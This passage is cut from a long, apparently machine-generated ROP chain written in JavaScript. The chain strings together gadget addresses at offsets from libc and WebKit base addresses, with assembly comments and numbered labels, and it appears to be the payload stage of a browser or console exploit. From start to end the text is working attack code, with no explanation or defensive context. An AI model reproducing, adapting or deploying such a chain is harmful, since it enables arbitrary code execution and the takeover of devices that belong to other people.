//mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L777: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L778: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L779: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+96464, //L781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L781: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+96520, //L782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L782: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+96616, //L785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L784: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L785: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L786: db([11, 0]); // 0xb set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+96712, //L787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+96728, //L788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L788: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+96816, //L790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L790: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96872, //L791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L791: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+96944, //L794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L794: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97000, //L795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L795: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L797: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+97136, //L798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L798: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L800: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+97256, //L803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+97240, //L801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L801: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L803: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97400, //L806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+97368, //L804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+97384, //L805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L804: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L805: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L806: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+97472, //L808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+763368 //pop rcx ]); //L808: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+97528, //L809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L809: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+97624, //L812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L811: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L812: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L813: db([12, 0]); // 0xc set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+97720, //L814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+97736, //L815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L815: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+97824, //L817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L817: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97880, //L818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L818: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, 
rdi libc_base+764760, //pop rsi ropchain+97952, //L821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L821: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98008, //L822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L822: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L824: libc_base+428453, //mov rax, rdx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+98144, //L825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L825: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L827: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+98264, //L830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+98248, //L828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L828: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L830: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98408, //L833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+98376, //L831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+98392, //L832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L831: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L833: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+98480, //L835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L835: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+98536, //L836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+98632, //L839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L838: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L840: db([13, 0]); // 0xd set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+98728, //L841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+98744, //L842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L841: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L842: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+98832, //L844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L844: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98888, //L845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L845: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+98960, //L848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L848: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99016, //L849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L849: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L851: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+99152, //L852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L852: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L854: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+99272, //L857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+99256, //L855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L857: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99416, //L860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+99384, //L858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+99400, //L859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L859: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+99488, //L862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L862: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+99544, //L863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L863: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+99640, //L866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L865: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L867: db([14, 0]); // 0xe set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+99736, //L868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+99752, //L869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L868: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L869: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+99840, //L871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L871: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99896, //L872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L872: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+99968, //L875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L875: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100024, //L876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L876: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+100112, //L878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L878: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L880: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+100232, //L883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+100216, //L881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L881: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L883: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100376, //L886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+100344, //L884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+100360, //L885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L884: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L886: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+100448, //L888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L888: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+100504, //L889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L889: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+100600, //L892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L891: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L892: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L893: db([4, 0]); // 0x4 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+100696, //L894 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+100712, //L895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L894: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L895: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+100800, //L897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L897: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100856, //L898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L898: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+100960, //L900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L900: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L902: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+101080, //L905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+101064, //L903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L903: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L905: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, 
//mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101224, //L908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+101192, //L906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+101208, //L907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L906: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L907: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L908: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+101296, //L910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L910: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+101352, //L911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L911: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+101448, //L914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L913: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L914: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L915: db([15, 0]); // 0xf set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+101544, //L916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+101560, //L917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L916: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L917: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+101648, //L919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L919: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101704, //L920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L920: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+101776, //L923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L923: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101832, //L924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L926: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+101968, //L927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L929: db([16, 0]); // 0x10 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+102088, //L932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+102072, //L930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L930: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L932: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102232, //L935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+102200, //L933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+102216, //L934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L934: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L935: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+102304, //L937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L937: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+102360, //L938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L938: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+102456, //L941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L940: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 
